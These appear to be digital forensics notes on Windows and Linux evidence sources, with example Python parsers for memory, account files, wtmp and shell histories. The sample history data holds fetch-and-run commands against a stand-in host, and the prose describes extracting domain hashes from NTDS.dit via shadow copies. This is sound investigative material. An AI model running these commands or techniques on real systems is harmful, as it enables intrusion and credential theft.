Hidden File Compartments

The NTFS file system lets applications create alternate data streams (ADS). By default a file's content lives in its main, unnamed data stream, but using the syntax 'file:stream' an application can read and write additional named streams. Directory listings and file sizes only report the unnamed stream, so an ADS is an easy place for an attacker to hide tools or staged data on an NTFS volume.

Find them

Get-Item -path .\hello.txt -stream *

Read them out

Get-Content -path .\hello.txt -stream hidden

Computer Forensics

Windows Operating System Artifacts

Volume Shadow Service (VSS)

The Volume Shadow Copy Service (VSS) maintains point-in-time snapshots of volumes. An examiner may be able to locate previous versions of files and recover them from the snapshots stored on a Windows system. This can be a valuable source of evidence even if a user deleted, wiped, or otherwise cleaned up files in an attempt to cover their tracks.

Microsoft Active Directory domain controllers keep the credential hashes for all domain users in the %SystemRoot%\NTDS\NTDS.dit database file. The file is held open and locked by the directory service while it is running, so it cannot simply be copied. Attackers use VSS to get around this: they create a shadow copy of the system volume (for example with vssadmin create shadow), copy NTDS.dit together with the SYSTEM registry hive (which holds the key needed to decrypt the hashes) out of the snapshot, and extract the credential hashes for every domain user offline. Shadow copy creation on a domain controller is therefore worth alerting on.

Recycle Bin

Each user who has logged into the system and deleted something on the volume will have a Recycle Bin subfolder named after their security identifier (SID). The files the user sent to the Recycle Bin are stored in that personal subfolder. Analysts have observed that attackers frequently leave tools and utilities in the root of the Recycle Bin (C:\Recycler\ on Windows XP/2003, C:\$Recycle.Bin on Vista and later), where they are not tied to any user's SID folder.

Event Logs

The legacy event logs AppEvent.evt, SecEvent.evt, and SysEvent.evt (Application.evtx, Security.evtx, and System.evtx from Windows Vista/Server 2008 onward) contain logged information about the system. Events 528 (successful logon) and 540 (successful network logon) in SecEvent.evt, and event 4624 (an account was successfully logged on) in Security.evtx, record logons; the Logon Type field distinguishes interactive (type 2), network (type 3) and remote interactive/RDP (type 10) logons, so filter on it rather than treating every 4624 as an interactive login.

Memory

The page file %SystemRoot%\pagefile.sys holds memory pages that Windows has swapped out of RAM, so it can contain fragments of process memory long after the owning process has exited and should be collected together with a RAM image. Forensically interesting artifacts that can be found in memory include:

  • running processes,
  • Windows event log records,
  • plain-text passwords for various applications,
  • Windows credentials,
  • strings.

Encrypted file systems can be difficult to decrypt without credentials. Fortunately, Windows may keep the passwords and keys used for encrypted file systems in memory; tools such as mimikatz extract credentials from the memory of the LSASS process.

RAR Passwords

Attackers frequently use the WinRAR (RARLAB) command-line tool to compress and encrypt data they intend to steal. To encrypt the archive including its file names, the attacker passes the "-hp" switch with the password directly on the command line ("-p" encrypts only the file contents and leaves the file names visible). Searching memory and disk for the string "-hp" has repeatedly turned up attackers' archive passwords. Because Windows stores process command lines as UTF-16LE, search for the switch in both ASCII and UTF-16LE form.
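As an added example (not code from the original page), the following scanner looks for the "-hp" switch in a memory or disk image in both ASCII and UTF-16LE form, extracts the password whether it was quoted or not, and reports the byte offset of each hit. The sample image is constructed inline and is not a real dump.

```python
import re

# Constructed memory fragment for the example (not a real dump).  The attacker's
# command line appears once as ASCII and once as UTF-16LE, the encoding Windows
# uses for process command lines held in memory.
ASCII_CMD = (b"C:\\Windows\\Temp\\rar.exe a -r -hpP@ssw0rd! "
             b"C:\\Windows\\Temp\\out.rar C:\\Users\\bob\\Documents\n")
WIDE_CMD = 'rar.exe a -hp"Sup3r Secret" exfil.rar \\\\fileserver\\finance'.encode("utf-16-le")
SAMPLE_DUMP = (b"\x00" * 64 + b"MZ\x90\x00" + b"\x00" * 32 + ASCII_CMD
               + b"\xff" * 128 + WIDE_CMD + b"\x00" * 64)

# '-hp' followed by either a double-quoted password (may contain spaces) or an
# unquoted one that ends at the next whitespace or NUL.  The length cap keeps a
# hit inside random data from running away.
HP_ASCII = re.compile(rb'-hp(?:"([^"\x00]{1,128})"|([^\s"\x00]{1,128}))')
# The same switch in UTF-16LE: every ASCII character is followed by a NUL byte.
# Matching on bytes keeps the offset exact and needs no alignment guessing.
HP_WIDE = re.compile(
    rb'-\x00h\x00p\x00(?:"\x00((?:[^"\x00]\x00){1,128})"\x00|((?:[^\s"\x00]\x00){1,128}))')


def find_rar_passwords(blob: bytes) -> list:
    """Return [{offset, encoding, password}] for every '-hp' switch found in blob."""
    hits = []
    for m in HP_ASCII.finditer(blob):
        pw = m.group(1) or m.group(2)
        hits.append({"offset": m.start(), "encoding": "ascii",
                     "password": pw.decode("ascii", "replace")})
    for m in HP_WIDE.finditer(blob):
        pw = m.group(1) or m.group(2)
        hits.append({"offset": m.start(), "encoding": "utf-16-le",
                     "password": pw.decode("utf-16-le", "replace")})
    return sorted(hits, key=lambda h: h["offset"])


if __name__ == "__main__":
    for hit in find_rar_passwords(SAMPLE_DUMP):
        print(f"0x{hit['offset']:08x} {hit['encoding']:9} {hit['password']}")
```

Run it against a raw memory image or pagefile.sys read into bytes (memory-map large files rather than reading them whole). Treat hits as leads: the three characters "-hp" also occur inside unrelated strings, so confirm that the surrounding bytes look like a rar.exe command line.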

Linux Distributions

/etc

contains system configuration, including information about the version of the distribution, services, runlevel (or default systemd target), and time zone. It can be thought of as roughly the Linux equivalent of the Windows Registry.

passwd/shadow

passwd lists user and system accounts, one per line with colon-separated fields. The password field holds an "x" when the hash is stored in the shadow file; the shadow file, readable only by root, holds each account's password hash together with password-aging information. To find accounts that can log in interactively, an analyst can run grep -v nologin on the passwd file (also excluding shells such as /bin/false), and should additionally look for accounts other than root with UID 0, empty password fields in shadow, and hashes left directly in passwd.
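The following script is an added example (not part of the original notes) that carries out the review described above on constructed passwd and shadow excerpts: it lists accounts with a login shell and flags the conditions an analyst checks by hand (extra UID 0 accounts, empty passwords, hashes left in passwd, weak md5crypt hashes, and locked accounts that still have a login shell), along with the date each password was last changed.

```python
import datetime as dt

# Constructed /etc/passwd and /etc/shadow excerpts for the example (not from a real host).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/bin/false
alice:x:1000:1000:Alice:/home/alice:/bin/bash
svc:x:0:1001:service:/tmp:/bin/sh
guest:x:1002:1002::/home/guest:/bin/zsh
legacy:$1$abcdefgh$0123456789abcdefghijkl:1003:1003::/home/legacy:/bin/bash
"""
SHADOW = """\
root:$6$saltsalt$hashhashhashhashhashhashhashhashhashhashhashhash:19700:0:99999:7:::
daemon:*:19700:0:99999:7:::
sshd:*:19700:0:99999:7:::
backup:!:19700:0:99999:7:::
alice:$y$j9T$saltsaltsalt$hashhashhashhash:19730:0:99999:7:::
svc:$1$salt$hashhashhashhashhashhash:19735:0:99999:7:::
guest::19740:0:99999:7:::
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text):
    """name -> {pw, uid, gid, gecos, home, shell} for each passwd line."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, pw, uid, gid, gecos, home, shell = line.split(":", 6)
        users[name] = {"pw": pw, "uid": int(uid), "gid": int(gid),
                       "gecos": gecos, "home": home, "shell": shell}
    return users


def parse_shadow(text):
    """name -> {hash, changed}; 'changed' is the date the password was last set."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        name, pw_hash, lastchg = fields[0], fields[1], fields[2]
        # Field 3 is days since 1970-01-01.
        changed = dt.date(1970, 1, 1) + dt.timedelta(days=int(lastchg)) if lastchg else None
        entries[name] = {"hash": pw_hash, "changed": changed}
    return entries


def review_accounts(passwd_text, shadow_text):
    """Return one finding dict per account with the checks an analyst runs by hand."""
    shadow = parse_shadow(shadow_text)
    report = []
    for name, u in parse_passwd(passwd_text).items():
        sh = shadow.get(name)
        pw_hash = sh["hash"] if sh is not None else u["pw"]  # old systems keep the hash in passwd
        can_login = u["shell"] not in NOLOGIN_SHELLS
        flags = []
        if u["uid"] == 0 and name != "root":
            flags.append("uid-0")             # a second root-equivalent account
        if u["pw"] != "x":
            flags.append("hash-in-passwd")    # world-readable hash
        if can_login and pw_hash == "":
            flags.append("empty-password")
        if can_login and pw_hash.startswith("$1$"):
            flags.append("md5crypt")          # weak, fast-to-crack hash
        if can_login and pw_hash.startswith(("!", "*")):
            flags.append("locked")            # login shell but password disabled
        report.append({"name": name, "uid": u["uid"], "shell": u["shell"],
                       "can_login": can_login, "flags": flags,
                       "changed": sh["changed"] if sh else None})
    return report


if __name__ == "__main__":
    for r in review_accounts(PASSWD, SHADOW):
        if r["can_login"] or r["flags"]:
            print(f"{r['name']:8} uid={r['uid']:<5} {r['shell']:18} "
                  f"changed={r['changed']} {' '.join(r['flags'])}")
```

On a mounted evidence image, point the two parsers at {mount}/etc/passwd and {mount}/etc/shadow; a password-change date that falls inside the incident window, or an account that exists in passwd but not in shadow, deserves a closer look.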

hosts

The hosts file maps hostnames to IP addresses and is given priority over DNS by default.

hostname

The hostname file keeps the host name of the current host.

*release* or *version*

The distribution name and version are recorded in files in the /etc directory whose names contain "release" or "version" (for example os-release). These files can be found with ls /etc/*release* or ls /etc/*version*.

/var/log

contains the majority of log files; on some systems log files might also be located in /var/adm.

wtmp/utmp

wtmp is a binary log file that contains the historical login and reboot records for the system. The file utmp contains the currently logged-in users (more important when doing live response), and btmp, where present, records failed logins. Each file is a sequence of fixed-size utmp records and can be viewed with last -f {path to wtmp/utmp} (lastb for btmp).
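An added example (not from the original notes) that decodes wtmp records directly and pairs logins with their logouts the way last does, which is useful when last is unavailable on the analysis box or the record layout needs checking by hand. The record layout assumed here is glibc's struct utmp on x86_64 Linux (384 bytes); the sample file is constructed in the script and is not from a real host.

```python
import socket
import struct
import datetime as dt

# glibc 'struct utmp' as laid out on x86_64 Linux, 384 bytes per record.  This
# layout is an assumption of the example; other architectures and libcs differ,
# and the first check on a real file is that its size is a multiple of the record size.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)        # 384
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8


def _cstr(raw):
    return raw.split(b"\x00", 1)[0].decode("utf-8", "replace")


def parse_wtmp(data):
    """Decode every fixed-size record in a wtmp/utmp/btmp image."""
    if len(data) % UTMP_SIZE:
        raise ValueError("size is not a multiple of the utmp record: wrong layout or truncated file")
    records = []
    for off in range(0, len(data), UTMP_SIZE):
        (ut_type, pid, line, _id, user, host, _term, _exit, _sess,
         tv_sec, _usec, a0, _a1, _a2, _a3) = struct.unpack_from(UTMP_FMT, data, off)
        # ut_addr_v6[0] carries the IPv4 address when the host field is empty.
        ip = socket.inet_ntoa(struct.pack("<i", a0)) if a0 else ""
        records.append({"type": ut_type, "pid": pid, "line": _cstr(line),
                        "user": _cstr(user), "host": _cstr(host) or ip, "time": tv_sec})
    return records


def sessions(records):
    """Pair each USER_PROCESS record with the logout on the same line, as 'last' does."""
    open_by_line, result = {}, []
    for r in records:
        if r["type"] == USER_PROCESS:
            s = {"user": r["user"], "line": r["line"], "host": r["host"],
                 "start": r["time"], "end": None}
            open_by_line[r["line"]] = s
            result.append(s)
        elif r["type"] in (DEAD_PROCESS, BOOT_TIME):
            # A DEAD_PROCESS closes one line; a reboot closes every open session
            # (last would label those "crash" or "down").
            lines = list(open_by_line) if r["type"] == BOOT_TIME else [r["line"]]
            for ln in lines:
                s = open_by_line.pop(ln, None)
                if s:
                    s["end"] = r["time"]
    for s in result:
        s["duration"] = None if s["end"] is None else s["end"] - s["start"]
    return result


def make_record(ut_type, pid, line, user, host, tv_sec, ipv4=""):
    """Build one record in the layout above (used only to construct the sample)."""
    a0 = struct.unpack("<i", socket.inet_aton(ipv4))[0] if ipv4 else 0
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, a0, 0, 0, 0)


T0 = 1700000000
SAMPLE_WTMP = b"".join([                      # constructed sample, not a real wtmp
    make_record(BOOT_TIME, 0, "~", "reboot", "6.1.0-generic", T0),
    make_record(USER_PROCESS, 1234, "pts/0", "alice", "", T0 + 100, "10.0.0.5"),
    make_record(USER_PROCESS, 1300, "pts/1", "bob", "workstation7", T0 + 160),
    make_record(DEAD_PROCESS, 1234, "pts/0", "", "", T0 + 3700),
])


def _fmt(ts):
    return dt.datetime.fromtimestamp(ts, dt.timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


if __name__ == "__main__":
    for s in sessions(parse_wtmp(SAMPLE_WTMP)):
        end = _fmt(s["end"]) if s["end"] else "still logged in"
        print(f"{s['user']:8} {s['line']:6} {s['host']:15} {_fmt(s['start'])} - {end}")
```

To use it on evidence, read {mount}/var/log/wtmp into bytes and pass it to parse_wtmp; the timestamps are seconds since the epoch in UTC and should be converted with the host's time zone from /etc in mind.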

secure

(auth.log on Debian-based systems) records authentication events, including SSH logins and su and sudo privilege changes.

messages/syslog

includes system messages, software messages, and events that are not found in other logs. Default logrotate settings roll the log over weekly and keep four weeks of historical copies.

dmesg

The dmesg file is a copy of the kernel ring buffer: boot messages followed by hardware, driver and network interface events. It can contain USB device insertion records (vendor, product and serial number) that may be valuable when an analyst is trying to show that data was exported to a USB device.

audit

If the auditd service is enabled on a system, it records the events selected by its rules (system calls, file access, logins, privilege use) in /var/log/audit/audit.log. These files are plain text and can be read directly, or summarised with aureport -if {audit.log} and searched with ausearch -if {audit.log} (if the audit package is installed on the analysis system).

shell History

The shell history of a user is kept in their home directory. bash stores it in .bash_history; ksh, zsh and csh typically use .history or a shell-specific file such as .zsh_history, depending on HISTFILE. By default .bash_history contains no timestamps; bash records them only when HISTTIMEFORMAT is set, as a comment line of the form #<epoch> before each command. zsh with EXTENDED_HISTORY records a UNIX timestamp and the elapsed time for every command. History is normally written when the shell exits, and an attacker with shell access can truncate or edit the file, so treat gaps with suspicion.
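The following script is an added example (not part of the original notes) that parses both timestamp formats described above, bash's #<epoch> stamp lines and zsh's ": <start>:<elapsed>;<command>" extended history, and merges them into one chronology with unstamped commands sorted last. The history fragments are constructed for the example and are not from a real host.

```python
import re
import datetime as dt

# Constructed history files for the example (not from a real host).
BASH_HISTORY = """\
whoami
#1700000000
ls -la /root
#1700000042
wget http://example.invalid/x.sh -O /tmp/.x
#1700000100
/tmp/.x
"""
ZSH_HISTORY = """\
: 1700000500:0;curl -s http://example.invalid/payload | sh
: 1700000560:12;tar czf /tmp/docs.tgz /home/alice/Documents
history -c
"""

BASH_TS = re.compile(r"#(\d{9,11})")              # written by bash when HISTTIMEFORMAT is set
ZSH_EXT = re.compile(r"^: (\d+):(\d+);(.*)$")     # zsh EXTENDED_HISTORY: ': <start>:<elapsed>;<cmd>'


def parse_bash_history(text):
    """A '#<epoch>' line stamps the command lines that follow it until the next stamp;
    commands written before HISTTIMEFORMAT was set have no timestamp at all."""
    entries, ts = [], None
    for line in text.splitlines():
        m = BASH_TS.fullmatch(line)
        if m:
            ts = int(m.group(1))
            continue
        entries.append({"shell": "bash", "ts": ts, "elapsed": None, "cmd": line})
    return entries


def parse_zsh_history(text):
    """Extended-history lines carry start time and run time; plain lines carry neither."""
    entries = []
    for line in text.splitlines():
        m = ZSH_EXT.match(line)
        if m:
            entries.append({"shell": "zsh", "ts": int(m.group(1)),
                            "elapsed": int(m.group(2)), "cmd": m.group(3)})
        else:
            entries.append({"shell": "zsh", "ts": None, "elapsed": None, "cmd": line})
    return entries


def timeline(*entry_lists):
    """Merge histories into one chronology; unstamped commands keep file order and sort last."""
    merged = [e for lst in entry_lists for e in lst]
    merged.sort(key=lambda e: (e["ts"] is None, e["ts"] or 0))
    for e in merged:
        e["when"] = (dt.datetime.fromtimestamp(e["ts"], dt.timezone.utc).isoformat()
                     if e["ts"] is not None else "unknown")
    return merged


if __name__ == "__main__":
    for e in timeline(parse_bash_history(BASH_HISTORY), parse_zsh_history(ZSH_HISTORY)):
        print(f"{e['when']:25} {e['shell']:5} {e['cmd']}")
```

When reviewing a real file, also compare the file's modification time and record count against the user's wtmp sessions: a history that ends with a history -c, or that is far shorter than the login activity suggests, usually means it was cleaned.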

Memory

Linux memory artifacts include RAM and swap. Linux uses virtual memory: pages that do not fit in RAM are written to a swap partition or swap file (commonly /swapfile; check /etc/fstab or swapon --show), so swap can hold fragments of process memory from processes that ran in the foreground or background. While the system is running, per-process memory can be examined through the virtual /proc file system (for example /proc/{pid}/maps and /proc/{pid}/mem). Forensically interesting artifacts that can be found in memory include:

  • running processes,
  • plain-text passwords for various applications,
  • log events, and
  • strings.

LiME (Linux Memory Extractor) is a loadable kernel module designed to acquire physical memory from Linux systems. Before the 2.6 kernel series, physical memory was unprotected and could be imaged with a dd command copying /dev/mem to a file; modern kernels restrict /dev/mem (CONFIG_STRICT_DEVMEM), so a kernel-module acquisition tool such as LiME is needed. Tools such as Volatility can analyze Linux memory images but require a profile matching the exact kernel version and configuration of the imaged system.